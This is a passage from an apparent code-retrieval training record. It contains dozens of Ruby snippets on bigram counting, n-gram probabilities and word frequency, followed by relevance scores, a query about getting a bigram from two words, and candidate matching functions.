1988727,\n'MY' => 1949129,\n'OY' => 1932892,\n'KN' => 1903836,\n'IZ' => 1865802,\n'XP' => 1840696,\n'LW' => 1836811,\n'TN' => 1782119,\n'KO' => 1758001,\n'AA' => 1721143,\n'JA' => 1712763,\n'ZE' => 1709871,\n'FC' => 1570791,\n'GW' => 1567991,\n'TG' => 1530045,\n'XT' => 1509969,\n'FH' => 1507604,\n'LR' => 1505092,\n'JE' => 1487348,\n'YN' => 1485655,\n'GG' => 1468286,\n'GF' => 1465290,\n'EQ' => 1461436,\n'HY' => 1446451,\n'KT' => 1443985,\n'HC' => 1441057,\n'BS' => 1409672,\n'HW' => 1403223,\n'HN' => 1383958,\n'CS' => 1381608,\n'HM' => 1353001,\n'NJ' => 1342735,\n'HH' => 1329998,\n'WT' => 1301293,\n'GC' => 1299541,\n'LH' => 1274048,\n'EJ' => 1256993,\n'FM' => 1251312,\n'DV' => 1238565,\n'LV' => 1238287,\n'WR' => 1226755,\n'GP' => 1215204,\n'FP' => 1199845,\n'GB' => 1184377,\n'GM' => 1178511,\n'HL' => 1169468,\n'LK' => 1164186,\n'CY' => 1145316,\n'MC' => 1101727,\n'YG' => 1049082,\n'XI' => 1024736,\n'HB' => 1014004,\n'FW' => 1005903,\n'GY' => 979804,\n'HP' => 978649,\n'MW' => 937621,\n'PM' => 931225,\n'ZA' => 929119,\n'LG' => 926472,\n'IW' => 922059,\n'XA' => 904148,\n'FB' => 888155,\n'SV' => 882083,\n'GD' => 879792,\n'IX' => 879360,\n'AJ' => 870262,\n'KL' => 846309,\n'HF' => 834284,\n'HD' => 828755,\n'AE' => 815963,\n'SQ' => 800346,\n'DJ' => 799366,\n'FY' => 789961,\n'AZ' => 768359,\n'LN' => 752316,\n'AO' => 749566,\n'FD' => 748027,\n'KW' => 719633,\n'MF' => 715087,\n'MH' => 710864,\n'SJ' => 704442,\n'UF' => 701892,\n'TV' => 698150,\n'XC' => 697995,\n'YU' => 695512,\n'BB' => 689158,\n'WW' => 674610,\n'OJ' => 661082,\n'AX' => 660826,\n'MR' => 660619,\n'WL' => 657782,\n'XE' => 653947,\n'KH' => 650095,\n'OX' => 650078,\n'UO' => 649906,\n'ZI' => 644035,\n'FG' => 637758,\n'IH' => 610683,\n'TK' => 610333,\n'II' => 607124,\n'IU' => 576683,\n'TJ' => 559473,\n'MN' => 558397,\n'WY' => 553647,\n'KY' => 553296,\n'KF' => 537342,\n'FN' => 534362,\n'UY' => 531960,\n'PW' => 530411,\n'DK' => 525744,\n'RJ' => 518157,\n'UK' => 514873,\n'KR' => 507020,\n'KU' => 506618,\n'WM' => 505687,\n'KM' => 485617,\n'MD' => 481126,\n'ML' => 478528,\n'EZ' => 465466,\n'KB' => 457860,\n'WC' => 448394,\n'WD' => 432646,\n'HG' => 429607,\n'BT' => 428276,\n'ZO' => 424016,\n'KC' => 420017,\n'PF' => 418168,\n'YV' => 411487,\n'PC' => 400308,\n'PY' => 396147,\n'WB' => 394820,\n'YK' => 391953,\n'CP' => 382923,\n'YJ' => 378679,\n'KP' => 375653,\n'PB' => 369336,\n'CD' => 358435,\n'JI' => 357577,\n'UW' => 352732,\n'UH' => 339341,\n'WF' => 336213,\n'YY' => 332973,\n'WP' => 321746,\n'BC' => 320380,\n'AQ' => 315068,\n'CB' => 298053,\n'IQ' => 291635,\n'CM' => 285942,\n'MG' => 285133,\n'DQ' => 283314,\n'BJ' => 282608,\n'TZ' => 280007,\n'KD' => 277982,\n'PD' => 273162,\n'FJ' => 269865,\n'CF' => 267630,\n'NZ' => 266461,\n'CW' => 257253,\n'FV' => 244685,\n'VY' => 233082,\n'FK' => 228905,\n'OZ' => 228556,\n'ZZ' => 221275,\n'IJ' => 219128,\n'LJ' => 218362,\n'NQ' => 217422,\n'UV' => 212051,\n'XO' => 211173,\n'PG' => 211133,\n'HK' => 210385,\n'KG' => 209266,\n'VS' => 204093,\n'HV' => 197539,\n'BM' => 191807,\n'HJ' => 189906,\n'CN' => 188046,\n'GV' => 186777,\n'CG' => 181590,\n'WU' => 180884,\n'GJ' => 176947,\n'XH' => 166599,\n'GK' => 163830,\n'TQ' => 159111,\n'CQ' => 157546,\n'RQ' => 156933,\n'BH' => 154489,\n'XS' => 154347,\n'UZ' => 153736,\n'WK' => 148964,\n'XU' => 147533,\n'UX' => 144814,\n'BD' => 141752,\n'BW' => 140189,\n'WG' => 139890,\n'MV' => 136314,\n'MJ' => 134263,\n'PN' => 131645,\n'XM' => 127492,\n'OQ' => 122677,\n'BV' => 120081,\n'XW' => 119322,\n'KK' => 118811,\n'BP' => 115161,\n'ZU' => 113538,\n'RZ' => 113432,\n'XF' => 113031,\n'MK' => 111041,\n'ZH' => 107639,\n'BN' => 106125,\n'ZY' => 105871,\n'HQ' => 101241,\n'WJ' => 99435,\n'IY' => 98361,\n'DZ' => 98038,\n'VR' => 96416,\n'ZS' => 94993,\n'XY' => 94329,\n'CV' => 94224,\n'XB' => 94041,\n'XR' => 90046,\n'UJ' => 88168,\n'YQ' => 87953,\n'VD' => 85611,\n'PK' => 83017,\n'VU' => 82830,\n'JR' => 80471,\n'ZL' => 80039,\n'SZ' => 79840,\n'YZ' => 78281,\n'LQ' => 77148,\n'KJ' => 76816,\n'BF' => 75352,\n'NX' => 74844,\n'QA' => 73527,\n'QI' => 73387,\n'KV' => 73184,\n'ZW' => 68865,\n'WV' => 63930,\n'UU' => 63043,\n'VT' => 62912,\n'VP' => 62577,\n'XD' => 60101,\n'GQ' => 59750,\n'XL' => 59585,\n'VC' => 59024,\n'CZ' => 57914,\n'LZ' => 57314,\n'ZT' => 56955,\n'WZ' => 52836,\n'SX' => 50975,\n'ZB' => 50652,\n'VL' => 49032,\n'PV' => 48105,\n'FQ' => 47504,\n'PJ' => 47043,\n'ZM' => 46034,\n'VW' => 45608,\n'CJ' => 41526,\n'ZC' => 41037,\n'BG' => 40516,\n'JS' => 39326,\n'XG' => 39289,\n'RX' => 38654,\n'HZ' => 37066,\n'XX' => 35052,\n'VM' => 35024,\n'XN' => 34734,\n'QW' => 34669,\n'JP' => 34520,\n'VN' => 33082,\n'ZD' => 32906,\n'ZR' => 32685,\n'FZ' => 31186,\n'XV' => 31117,\n'ZP' => 30389,\n'VH' => 30203,\n'VB' => 29192,\n'ZF' => 28658,\n'GZ' => 28514,\n'TX' => 28156,\n'VF' => 28090,\n'DX' => 27413,\n'QB' => 27307,\n'BK' => 26993,\n'ZG' => 26369,\n'VG' => 25585,\n'JC' => 24770,\n'ZK' => 24262,\n'ZN' => 24241,\n'UQ' => 23386,\n'JM' => 22338,\n'VV' => 22329,\n'JD' => 21903,\n'MQ' => 21358,\n'JH' => 20960,\n'QS' => 20847,\n'JT' => 20408,\n'JB' => 19380,\n'FX' => 19313,\n'PQ' => 18607,\n'MZ' => 18271,\n'YX' => 16945,\n'QT' => 16914,\n'WQ' => 16245,\n'JJ' => 16085,\n'JW' => 16083,\n'LX' => 15467,\n'GX' => 14778,\n'JN' => 14452,\n'ZV' => 14339,\n'MX' => 14250,\n'JK' => 13967,\n'KQ' => 13905,\n'XK' => 13651,\n'JF' => 12640,\n'QM' => 12315,\n'QH' => 12273,\n'JL' => 12149,\n'JG' => 12023,\n'VK' => 11469,\n'VJ' => 11432,\n'KZ' => 11192,\n'QC' => 10667,\n'XJ' => 10629,\n'PZ' => 9697,\n'QL' => 9603,\n'QO' => 9394,\n'JV' => 8925,\n'QF' => 8778,\n'QD' => 8678,\n'BZ' => 8132,\n'HX' => 7526,\n'ZJ' => 7167,\n'PX' => 6814,\n'QP' => 6062,\n'QE' => 6020,\n'QR' => 5975,\n'ZQ' => 5773,\n'JY' => 5723,\n'BQ' => 5513,\n'XQ' => 5416,\n'CX' => 5300,\n'KX' => 5083,\n'WX' => 4678,\n'QY' => 4557,\n'QV' => 4212,\n'QN' => 3808,\n'VX' => 3192,\n'BX' => 3021,\n'JZ' => 2859,\n'VZ' => 2633,\n'QG' => 2567,\n'QQ' => 2499,\n'ZX' => 2463,\n'XZ' => 2082,\n'QK' => 2023,\n'VQ' => 1488,\n'QJ' => 1342,\n'QX' => 765,\n'JX' => 747,\n'JQ' => 722,\n'QZ' => 280\n}\n end",
"def sentence_probability(sentence)\n probability_of_ngrams(ngrams_from_sentence(sentence))\n end",
"def apply_usage_weights(word_hash)\n max_usage = @word_list.values.max.to_f\n max_usage = 1 if max_usage == 0\n\n weighted_array = word_hash.map do |word, bigram_score|\n usage_score = @word_list[word].to_f / max_usage\n [word, (bigram_score * (1 - @alpha)) + (usage_score * @alpha)]\n end\n\n Hash[weighted_array]\n end",
"def word_prob(word, type)\n total_words_in_type = total_word_count_in_type(type)\n return total_words_in_type == 0 ? 0.0 : word_count(word, type).to_f / total_words_in_type\n end",
"def ngram_sets_w_freq_within_percent(n,pc)\n return nil unless (n.is_a?(Integer) && n>=1)\n arr = []\n (1..n).each {|i|\n @freq_n_chars[i].keys.each { |c|\n curr_freq = @freq_n_chars[i][c]\n @freq_n_chars[i].select {|k,v| k > c && ((v-curr_freq).abs < (pc ** i))}.keys.each { |el|\n if c.length==1\n arr << [c,el]\n else\n arr1 = c.chars\n arr2 = el.chars\n (0..(arr1.length-1)).each {|j|\n sorted_swp_chars = [arr1[j],arr2[j]].sort\n arr << sorted_swp_chars unless (arr.include?(sorted_swp_chars) || (arr1[j] == arr2[j]))\n }\n end\n }\n }\n }\n arr\n # result is an array of 2-element-arrays; each element of the\n # 2-element-array is an ngram similar to the other element ngram of same n\n end",
"def calculateWeight word\n letters = word.split\n weight = 0\n hash_alphabet = generateHashWithLetterAndWeight()\n letters.each do |letter|\n (/[[:upper:]]/.match(letter)) ? weight += hash_alphabet[letter.downcase].to_i * 2 : weight += hash_alphabet[letter.downcase].to_i\n end\n weight\n end",
"def fragment_probability(fragment)\n probability_of_ngrams(ngrams_from_fragment(fragment))\n end",
"def word_probability(word, category)\n total_words_in_category = total_word_count_in_category(category)\n return 0.0 if total_words_in_category == 0\n word_count(word, category).to_f / total_words_in_category\n end",
"def weight_in_words\n wt_kg = self.E16_01.to_f # in kg\n wt_lb = self.E16_88.to_f\n wt_in_lbs = wt_lb > 0 ? wt_lb : wt_kg*2.20462262\n \"%s lbs - %d kg\" % [((wt_in_lbs < 100) ? wt_in_lbs.round(1) : wt_in_lbs.round), wt_kg]\n end",
"def process_file(file_name)\n\tputs \"Processing File.... \"\n\n\tbegin\n\t\tIO.foreach(file_name) do |line|\n\t\t\t# Pull title out of text line\n\t\t\ttitle = cleanup_title(line)\n\n\t\t\tif not title.nil?\n\t\t\t # Split title into individual words\n\t\t\t words = title.split(\" \")\n\n\t\t\t\t# Remove stop words\n\t\t\t\tstop_words = ['a', 'an', 'and', 'by', 'for', 'from', 'in', 'of', 'on',\n\t\t\t\t\t 'or', 'out', 'the', 'to', 'with']\n\n\t\t\t\tfor i in 0..stop_words.length-1\n\t\t\t\t\twords.delete(stop_words[i])\n\t\t\t\tend\n\n\t\t\t\t# Count subsequent words\n\t\t\t\tfor i in 0..words.length-2\n\t\t\t\t\t$bigrams[words[i]][words[i+1]] += 1\n\t\t\t\tend\n\t\t\tend\n\tend\n\n\t\tputs \"Finished. Bigram model built.\\n\"\n\trescue\n\t\tSTDERR.puts \"Could not open file\"\n\t\texit 4\n\tend\nend",
"def update_bigram_counts(words)\n\t(0..(words.length - 2)).each do |i|\n\t\tkey = words[i]\n\t\tif $bigrams.has_key? key\n\t\t\tcounts = $bigrams[key]\n\t\t\tif counts.has_key? words[i + 1]\n\t\t\t\tcounts[words[i + 1]] += 1\n\t\t\telse\n\t\t\t\tcounts[words[i + 1]] = 1\n\t\t\tend\n\t\telse\n\t\t\tcounts = {words[i + 1] => 1}\n\t\t\t$bigrams[key] = counts\n\t\tend\n\tend\nend",
"def frequency_of(gram)\n @frequencies.fetch(gram,0)\n end",
"def calc_FPKM(weight_per_kb, total_num_read)\n\treturn weight_per_kb * 1_000_000 / total_num_read\nend",
"def prob_word_dist(arr)\n\tcounts = {}\n\t(0..arr[0].size-1).each do |i|\n\t\tcounts[i] = {}\n\tend\n\tarr.each do |word|\n\t\t(0..word.size-1).each do |i|\n\t\t\tif counts[i].has_key?(word[i]) then\n\t\t\t\tcounts[i][word[i]] += 1\n\t\t\telse\n\t\t\t\tcounts[i][word[i]] = 1\n\t\t\tend\n\t\tend\n\tend\n\tresult = []\n\t(0..arr.size-1).each do |i|\n\t\tcurr_word = \"\"\n\t\t(0..arr[0].size-1).each do |j|\n\t\t\ttemp_arr = []\n\t\t\tcounts[j].keys.each do |char|\n\t\t\t\t(1..counts[i][char]) do\n\t\t\t\t\ttemp_arr.push(char)\n\t\t\t\tend\n\t\t\tend\n\t\t\tcurr_word += temp_arr[random * temp_arr.size]\n\t\tend\n\t\tresult.add[curr_word]\n\tend",
"def score(other_counts)\n\t\tscore = 0.0\n\t\tseen = 0\n\t\tother_counts.each { |k, v|\n\t\t\tcount = @trigram_counts[k]\n\t\t\tscore += v * Math.log(@probs[@trigram_counts[k]])\n\t\t}\n\t\tscore\n\tend",
"def most_frequent_bigram(str)\n bigrams_hash = biagram_hash(str)\n bigrams_hash.key(bigrams_hash.values.max)\nend",
"def weighted_random(lastword)\n # If word has no words in its dictionary (last word in source text file)\n # have it pick a random word to display instead.\n @dictionary.dictionary.fetch(lastword, NULL_OBJECT).sample\n end",
"def probability_of_class(classification)\n @number_of_documents_in_class[classification] / @number_of_documents.to_f\n end",
"def most_frequent_bigram(str)\n most_freq = \"\"\n highest_freq = 0\n bigram_hash = Hash.new(0)\n len = str.length\n (0...len-1).each { |idx| bigram_hash[str[idx..idx+1]] += 1 }\n bigram_hash.each do |k, v| \n if v > highest_freq\n most_freq = k \n highest_freq = v\n end\n end\n most_freq\nend",
"def question_prob(question, type)\n type_prob = type_count(type) / @training_count\n doc_prob = question.split(' ').map { |w|\n word_weighted_average w, type\n }.inject(1) { |p,c| p * c }\n type_prob * doc_prob\n end",
"def most_frequent_bigram(str)\n binaries = [] \n letters = str.split(\"\") #\"thrill\"\n (0...(letters.length-1)).each_with_index do |letter,idx|\n binaries << (letters[idx] + letters[(idx + 1)])\n end\n hash = Hash.new(0)\n binaries.each do |pairs|\n hash[pairs] += 1 \n end\n sorted = hash.sort_by { |k , v| v }\n return sorted[-1][0]\nend",
"def weight(text)\n weight = @emphasis[:multiplier]\n\n if text.length >= @emphasis[:long_words_threshold]\n weight *= @emphasis[:long_words]\n end\n\n if text[0,1] == text[0,1].upcase\n weight *= @emphasis[:upper_case]\n end\n\n weight += vowels(text)\n weight += consonants(text)\n weight\n end",
"def probabilities_for(ngrams)\n table = {}\n\n ngrams.each do |ngram|\n table[ngram] = probability_of_ngram(ngram)\n end\n\n return table\n end",
"def probability\n return @probability\n end",
"def pEstimate(sentence)\n probability = 1\n tokens = sentence.split\n (2..(tokens.size-1)).to_a.each do |i|\n probability *= q(tokens[i-2..i])\n end\n probability\n end",
"def calculate_frequencies(target_file)\n\tn_char=0.0\n\n\n\ttext=File.read(target_file)\n\n\t#creo l'hash delle lettere\n\thsh=Hash.new\n\tcode=97\n\twhile code<=122 do\n\t\thsh[code]=Occurrences.new(0,0.000)\n\t\tcode+=1\n\tend\n\t#conto le occorrenze delle lettere\n\ttext.each_byte {|c|\n\t\tif c>=97 and c<=122;\n\t\t\thsh[c].number+=1\n\t\t\tn_char+=1\n\t\tend\n\t}\n\t#creo le frequenze\n\thsh.each {|k, v|\n\t\tv[1]=v[0]/n_char\n\t\t#puts\"number:#{v[0]} - percentage:#{v[1]}\"\n\t}\n\t#print dei valori creati\n\t#i=0\n\t#hsh.each {|k, v| puts \"elemento #{i} ---> #{k} is #{v}\",\n\t#\ti+=1\n\t#}\n\treturn hsh;\nend",
"def probabilities\n Hash[ BayesCategory.all.to_a.collect { |word|\n [word.category, probability(word.category)]\n }]\n end",
"def trigram_count()\n\t@corpus.each { |sentence_arr|\n\t prev_word_1 = \"\"\n\t prev_word_2 = \"\"\n\t sentence_arr.each { |word|\n\t\tif(prev_word_1 != \"\" && prev_word_2 != \"\")\n\t\t @trifreq[prev_word_1 + \" \" + prev_word_2 + \" \" + word] += 1\n\t\telsif(prev_word_1 == \"\" && prev_word_2 != \"\")\n\t\t @trifreq[\"PHI \"+prev_word_2+\" \"+word] += 1\n\t\telsif(prev_word_1 == \"\" && prev_word_2 == \"\")\n\t\t @trifreq[\"PHI PHI \"+word] += 1\t\n\t\tend \t \t\n\t\tprev_word_1 = prev_word_2 \n\t\tprev_word_2 = word\n\t }\n\t}\n end",
"def weight; end",
"def calculate_mle_probability next_ngram: nil, ngram_model: 0, separator: \" \", mode: :single\n raise ('MLE: ngram_model must be set explicitly in sentence mode') if (ngram_model==0 and mode == :sentence)\n\n local_ngram_model=ngram_model==0 ? next_ngram.split(separator).count : ngram_model\n if mode==:single\n rc=get_raw_counts(next_ngram,local_ngram_model)\n return rc.to_f/@good_turing_bins[ngram_model][0] # this is where we keep V\n elsif mode==:sentence\n return next_ngram.split(separator).each_cons(local_ngram_model).reduce(1) {|acc, word| (@ngram_counts[local_ngram_model][word.join(\" \")].to_f/@good_turing_bins[local_ngram_model][0].to_f)*acc}\n else\n raise ('MLE: unknown mode [available modes are :single and :sentence]') if (mode != :single and mode != :sentence)\n end\n end",
"def document_frequency\n @corpus.each_with_object({}) do |doc, df|\n doc.bag_of_words.keys.each do |word|\n df[word] = (df.fetch(word) { 0.0 }) + 1.0\n end\n end\n end",
"def percent_of_word(word)\n @total_count = SubWordJoin.where(word: word).count\n puts @total_count\n sub_count = 0\n @sub = SubDriver.where(driver: self)\n @sub.each do |sub|\n sub_count += SubWordJoin.where(word: word, sub_driver: sub).count\n end\n\n percent = (sub_count.to_f/@total_count)*100\n return percent.round(2)\n\n end",
"def get_weighted_word(dictionary, sample_space)\n sample_point = Random.rand(sample_space)\n i = 0\n str = \"\"\n dictionary.each_pair do |freq, words|\n words.each do |word|\n i += freq\n str = word\n return word if (i > sample_point)\n end\n end\n str\nend",
"def calculate_probability(useful_results, reroll_count)\n return 100.0 * useful_results / ( 6 ** reroll_count )\n end",
"def cond_probs polarity\n raise \"Invalid polarity\" unless [:pos, :neg].include? polarity\n\n # Divide the number of reviews each word occurs in by the total number of\n # reviews for that polarity\n count = @features[polarity].count.to_f\n (0..7).map { |i| @features[polarity].count { |f| f[i] } / count }\n end",
"def probability_token_in_label(label, token)\n (@data[label][token] || 0).to_f / @doc_counts[label].to_f\n end",
"def bakers_percent weight\n weight / bakers_percent_100.to_f\n end",
"def test_approach\n prefix = \"This pangram tallies \"\n solution = \"This pangram tallies five a's, one b, one c, two d's, twenty-eight e's, eight f's, six g's, eight h's, thirteen i's, one j, one k, three l's, two m's, eighteen n's, fifteen o's, two p's, one q, seven r's, twenty-five s's, twenty-two t's, four u's, four v's, nine w's, two x's, four y's and one z.\"\n pangram = SelfDocumentingPangram.new(prefix)\n assert_equal(solution, pangram.add_count(pangram.count(solution)))\n\n prefix = \"This terribly inefficient pangram contains \"\n solution = \"This terribly inefficient pangram contains five a's, two b's, three c's, two d's, thirty-one e's, six f's, four g's, ten h's, sixteen i's, one j, one k, three l's, two m's, twenty n's, thirteen o's, two p's, one q, twelve r's, twenty-eight s's, twenty-eight t's, three u's, three v's, nine w's, four x's, six y's and one z.\"\n pangram = SelfDocumentingPangram.new(prefix)\n assert_equal(solution, pangram.add_count(pangram.count(solution)))\n end",
"def mcw(input) #Debug assistance once again provided by George\n\n\tif ($bigrams[input]!=nil)\n\t\t\twordList = $bigrams[input].keys #Grabs all the keys from bigrams and adds them to wordList\n \tcurrentMCW = $bigrams[input].keys[0]#inits the most common one to the first occurance\n \ttotalWords = wordList.length #total number of words in the bigram\n \tx = 1 #simply a counter variable\n \twhile(x < totalWords) #iterates through each word in the key\n wordCheck = $bigrams[input].keys[x]\n if($bigrams[input][currentMCW]<$bigrams[input][wordCheck]) #checks to see if the frequency for the word we are checking is greater than our current MCW's frequency\n currentMCW = wordCheck #If it's frequency is greater than the current MCW's then it sets the newly found word to be the MCW\n end\n x+= 1\n \tend\n\t\t\tif (currentMCW!=nil)\n\t\t\t\treturn currentMCW\n\t\t\tend\n\t\tend\nend",
"def process_file(file_name)\n\tputs \"Processing File.... \"\n\n\tbegin\n\t\tIO.foreach(file_name) do |line|\n\t\t\tsong = cleanup_title(line)\n\n\t\t\tif not song.nil? and song =~ /^[\\d\\w\\s']+$/\n\t\t\t\tsong = song.downcase\n\t\t\t\tsong.gsub!(/ {2}/, \" \")\n\t\t\t\tsong = remove_stop_words(song)\n\t\t\t\twords = song.split(\" \");\n\n\t\t\t\tupdate_bigram_counts(words)\n\t\t\tend\n\t\tend\n\n\t\tputs \"Finished. Bigram model built.\\n\\n\"\n\trescue\n\t\tSTDERR.puts \"Could not open file\"\n\t\texit 4\n\tend\nend",
"def score\n documented = @files.inject(0) {|sum, file| sum += file.total_documented }\n total = @files.inject(0) {|sum, file| sum += file.total_entities }\n ((documented.to_f / total) * 100).to_i\n end",
"def compute_weights\n @weight = Hash.new\n \n @terms.each do |term|\n @doc_list.values.each do |doc|\n value = doc.freq_rel(term) * @idf[term]\n @weight[[term,doc]] = value\n\n assert { value >= 0 }\n end\n end\n end",
"def word_count\n weighted(:count, :word).to_i\n end",
"def ngram_analysis(str, n)\r\n # use a hash to store ngram - frequency mapping\r\n freq = Hash.new\r\n bigram = \"\"\r\n count = n-1\r\n i = 0\r\n\r\n # get the first ngram\r\n for i in 0..count\r\n bigram[i] = str[i]\r\n end\r\n\r\n freq[bigram] = 1\r\n\r\n str.each_char do |char|\r\n if i>=n then\r\n\r\n # bigram, trigram or quadrigram?\r\n bigram[0] = bigram[1]\r\n if n==2 then\r\n bigram[1] = char\r\n elsif n==3 then\r\n bigram[1] = bigram[2]\r\n bigram[2] = char\r\n elsif n==4 then\r\n bigram[1] = bigram[2]\r\n bigram[2] = bigram[3]\r\n bigram[3] = char\r\n end\r\n\r\n # updates values in the hash\r\n if freq.key?(bigram)==false then\r\n freq[bigram] = 1\r\n else \r\n freq[bigram] = freq[bigram]+1\r\n end\r\n\r\n end\r\n i = i + 1\r\n end\r\n\r\n # sort and print\r\n freq = freq.sort_by {|_key, value| value}.reverse.to_h\r\n i=0\r\n puts \"N-gram Analysis Results:\"\r\n freq.each do |key, value|\r\n if value!=1 && i<20 then\r\n puts key.to_s+\"\\t\"+value.to_s\r\n end\r\n i = i + 1\r\n end\r\nend",
"def most_frequent_bigram(str)\n adjacent_letter={}\n letter=\"\"\n (0...str.length-1).each do |i|\n letter=str[i]+str[i+1]\n if adjacent_letter.has_key?(letter)\n adjacent_letter[letter]+=1\n else\n adjacent_letter[letter]=1\n end\n end\n\n max=0\n max_aj=\"\"\n adjacent_letter.each do |k,v|\n if v>max\n max=v\n max_aj=k\n end\n end\n max_aj\n\n\nend",
"def most_frequent_bigram(str)\n bigram_hash = Hash.new(0)\n\n (0...str.length - 1).each do |idx|\n bigram_hash[str[idx] + str[idx+1]] += 1\n end\n\n sorted = bigram_hash.sort_by { |k, v| v }\n sorted[-1][0]\nend",
"def calculate_match_probability\n # two heuristics: \n # 1 is are their multiple words in term_text? if so, mark as probable\n # if not, does it match the anchor regexp? if so, mark as probable\n # else, mark as improbable\n \n # multiple words?\n anchor_regexp = \"(featuring|plus|the|presents|with|plus|and|\\,|\\&|[()]|\\/|\\:|\\-|^|$)\"\n nix_regexp = \"parking|\\svs\\.?\\s\" \n if artist_name=~/#{nix_regexp}/i\n self.match_probability=\"unlikely\"\n return nil\n end\n text=term_text.strip\n if text[\" \"]\n self.match_probability=\"likely\"\n return \"multpl\"\n end\n if artist_name=~/#{anchor_regexp}\\s*#{text}\\s*#{anchor_regexp}/i\n self.match_probability=\"likely\"\n return \"regexp\"\n end\n# if artist_name=~/#{anchor_regexp}\\s+?#{text}\\s+?#{anchor_regexp}/i\n# match_probability=\"likely\"\n# return \"regexp\"\n# end\n self.match_probability=\"unlikely\"\n return nil\n end",
"def text_commonality(text)\n probability_of_ngrams(common_ngrams_from_text(text))\n end",
"def good_word(wordlist)\n # letter frequency\n freqs = Hash.new { |h,k| h[k] = 0 }\n wordlist.each do |w|\n w.chars.each { |c| freqs[c] += 1 }\n end\n\n # score = number of unique chars X sum of letter frequencies\n wordlist.max_by do |w|\n chars = w.chars.to_a.uniq\n chars.length * chars.map{|c| freqs[c]}.inject{|sum,n| sum + n}\n end\nend",
"def compute_weights\n\t\t@weight = Hash.new\n\t\t\n\t\t@terms.each do |term|\n\t\t\t@doc_list.values.each do |doc|\n\t\t\t\tvalue = doc.freq_rel(term) * @idf[term]\n\t\t\t\t@weight[[term,doc]] = value\n\n\t\t\t\tassert { value >= 0 }\n\t\t\tend\n\t\tend\n\tend",
"def most_frequent_bigram(str)\n h = Hash.new(0)\n bigrams = (0..str.length-2).map{|i| str[i..i+1]}\n bigrams.each {|bi| h[bi] += 1}\n h.key(h.values.max)\nend",
"def most_frequent_bigram(str)\n bigrams = Hash.new(0)\n\n i = 0\n while i < str.length - 1\n bigrams[str[i..i+1]] += 1 \n i += 1\n end\n\n max_num = 0\n max = nil\n\n bigrams.each do |k,v|\n if v > max_num\n max_num = v\n max = k\n end\n end\n max\nend",
"def calculate_probability(key)\n\n\t\tk = key\n\n\t\tcase k\n\t\twhen 2\n\t\t\treturn TWO_TWELVE\n\t\twhen 3\n\t\t\treturn THREE_ELEVEN\n\t\twhen 4\n\t\t\treturn FOUR_TEN\n\t\twhen 5\n\t\t\treturn FIVE_NINE\n\t\twhen 6\n\t\t\treturn SIX_EIGHT\n\t\twhen 7\n\t\t\treturn SEVEN\n\t\twhen 8\n\t\t\treturn SIX_EIGHT\n\t\twhen 9\n\t\t\treturn FIVE_NINE\n\t\twhen 10\n\t\t\treturn FOUR_TEN\n\t\twhen 11\n\t\t\treturn THREE_ELEVEN\n\t\twhen 12\n\t\t\treturn TWO_TWELVE\n\t\telse\n\t\t\treturn 0\n\t\tend\n\tend",
"def grams\n gram_equivalent / amount\n end",
"def probability_token_is_label(token, label, prob_label)\n token_count = token_count(token)\n prob_token = token_count / @doc_counts.values.reduce(:+).to_f\n return nil if prob_token == 0.0\n\n prob_token_in_label = probability_token_in_label(label, token)\n (prob_token_in_label * prob_label) / prob_token\n end",
"def inverse_document_frequency(term)\n df = @model.document_count(term)\n if @function == :bm25\n log((documents.size - df + 0.5) / (df + 0.5))\n else\n 1 + log(documents.size / (df + 1.0))\n end\n end",
"def calculate\n document_frequency.each_with_object({}) do |(word, freq), idf|\n idf[word] = Math.log(@corpus.size/freq)\n end\n end",
"def most_frequent_bigram(str)\n bigrams = Hash.new(0)\n (0...str.length-1).each{|i| bigrams[ str[i..i+1] ] += 1}\n max = bigrams.first[0] # Hash#first returns first key value pair in an array\n bigrams.each {|key,val| max = key if val > bigrams[max]}\n # bigrams.sort_by{|b, v| v}.last[0]\n max\nend",
"def calc_score(word_list, total_freq, weight)\n hash = Hash.new{}\n word_list.each{|w|\n s = (weight * working_dictionary[w]/(total_freq)*100).round(4)\n hash[w] = s \n }\n hash = hash.sort_by{|k,v| -v} \n hash = Hash[*hash.flatten]\n return hash\n end",
"def most_frequent_bigram(str)\n sub_str_arr = []\n bigram_count = Hash.new(0)\n str.each_char.with_index do |char,idx|\n if idx+1 != nil && str[idx..idx+1].length ==2\n sub_str_arr << str[idx..idx+1]\n end\n end\n sub_str_arr.each {|bigram| bigram_count[bigram]+=1}\n \n sorted = bigram_count.sort_by {|key,value| value}\n sorted [-1][0]\n\n\nend",
"def to_grams wt\n return nil if wt.nil? or wt.length ==2\n return (wt[0]*1000+wt[1]+wt[2]/1000)\n end"
] | [
"0.76515126",
"0.714055",
"0.71191",
"0.6721609",
"0.6526299",
"0.6516771",
"0.63884306",
"0.63025784",
"0.61543596",
"0.61466616",
"0.60794854",
"0.6042595",
"0.59742594",
"0.5968507",
"0.5966927",
"0.5937904",
"0.5923168",
"0.5881117",
"0.5872214",
"0.58579516",
"0.5833358",
"0.58320016",
"0.58086807",
"0.57817966",
"0.57735896",
"0.575285",
"0.5708535",
"0.5704657",
"0.56648153",
"0.56529254",
"0.56288075",
"0.5594873",
"0.55847514",
"0.55716515",
"0.55629563",
"0.5543413",
"0.5536579",
"0.5532721",
"0.5529829",
"0.5501212",
"0.5497496",
"0.5491172",
"0.5489733",
"0.5481049",
"0.54710984",
"0.5463989",
"0.5443687",
"0.5442721",
"0.543354",
"0.54334503",
"0.54292566",
"0.54210407",
"0.5418359",
"0.5411163",
"0.5408126",
"0.5401261",
"0.5396001",
"0.53441364",
"0.5329309",
"0.5325446",
"0.5324593",
"0.53220123",
"0.5316679",
"0.5310136",
"0.5299031",
"0.5294788",
"0.5277856",
"0.5268478",
"0.5267041",
"0.52605915",
"0.5259067",
"0.52563936",
"0.52536803",
"0.52484053",
"0.52471393",
"0.52346325",
"0.52290094",
"0.52262163",
"0.5223689",
"0.52132434",
"0.5209546",
"0.51886404",
"0.5187168",
"0.51622534",
"0.5140699",
"0.514063",
"0.513402",
"0.51332164",
"0.5129691",
"0.5124415",
"0.5122632",
"0.51138204",
"0.5110224",
"0.51101124",
"0.5109741",
"0.509579",
"0.5095129",
"0.50934917",
"0.5089099",
"0.50867593"
] | 0.5987286 | 12 |
Get a bigram given both words. | def get(word1, word2)
@table[[word1,word2]]
end | {
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
} | [
"def bigramate(word)\n (0..(word.length - 2)).map { |i| word.slice(i, 2) }\n end",
"def bigram_compare(word1_bigrams, word2_bigrams)\n most_bigrams = [word1_bigrams.count, word2_bigrams.count].max\n num_matching(word1_bigrams, word2_bigrams).to_f / most_bigrams\n end",
